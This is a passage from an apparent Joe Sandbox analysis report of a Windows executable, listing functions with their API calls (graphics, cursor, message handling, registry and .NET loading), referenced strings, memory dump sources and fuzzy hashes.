                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                            • String ID: ,$?
                                                                            • API String ID: 2359071979-2308483597
                                                                            • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                            • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                            • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                            • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                            APIs
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                            • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                            • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                            • String ID:
                                                                            • API String ID: 1030595962-0
                                                                            • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                            • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                            • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                            • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                            APIs
                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                            • 74284620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                            • 74278830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                            • 742722A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                            • 74278830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Stretch$74278830$74272274284620BitsMode
                                                                            • String ID:
                                                                            • API String ID: 3137235269-0
                                                                            • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                            • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                            • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                            • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                              • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                              • Part of subcall function 0041EEB4: 74285940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                            • TranslateMessage.USER32(?), ref: 004571EB
                                                                            • DispatchMessageA.USER32(?), ref: 004571F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Message$TextWindow$74285940CurrentDispatchSendThreadTranslate
                                                                            • String ID: [Paused]
                                                                            • API String ID: 3114084439-4230553315
                                                                            • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                            • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                            • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                            • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                            APIs
                                                                            • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LoadSleep
                                                                            • String ID: CheckPassword
                                                                            • API String ID: 4023313301-1302249611
                                                                            • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                            • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                            • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                            • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                            APIs
                                                                              • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                              • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                              • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                            • GetTickCount.KERNEL32 ref: 00477C02
                                                                            • GetTickCount.KERNEL32 ref: 00477C0C
                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                            Strings
                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                            • API String ID: 613034392-3771334282
                                                                            • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                            • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                            • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                            • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                            Strings
                                                                            • CreateAssemblyCache, xrefs: 00459B9A
                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                            • Fusion.dll, xrefs: 00459B43
                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                            • API String ID: 190572456-3990135632
                                                                            • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                            • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                            • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                            • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                            APIs
                                                                              • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                            • GetFocus.USER32 ref: 0041C178
                                                                            • 7427A570.USER32(?), ref: 0041C184
                                                                            • 74278830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                            • 742722A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                            • 74278830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                            • 7427A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 742774278830$742722A480A570BitsFocusObject
                                                                            • String ID:
                                                                            • API String ID: 3722132614-0
                                                                            • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                            • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                            • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                            • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                            • 6FD82980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                              • Part of subcall function 004099C0: 6FD7C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                            • 6FDECB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                            • 6FDEC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                            • 6FDECB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                            • 6FD80860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$C400C740D80860D82980
                                                                            • String ID:
                                                                            • API String ID: 2924641870-0
                                                                            • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                            • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                            • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                            • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                            • API String ID: 47109696-2530820420
                                                                            • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                            • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                            • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                            • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                            • 7427A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                            Strings
                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                            • API String ID: 829082161-222967699
                                                                            • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                            • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                                            • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                            • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                                            APIs
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                            • String ID:
                                                                            • API String ID: 1458357782-0
                                                                            • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                            • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                            • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                            • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 004233BF
                                                                            • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                            • SetCursor.USER32(00000000), ref: 00423423
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1770779139-0
                                                                            • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                            • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                            • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                            • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02185EE8,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID: d_{$pI{
                                                                            • API String ID: 730355536-209899701
                                                                            • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                            • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
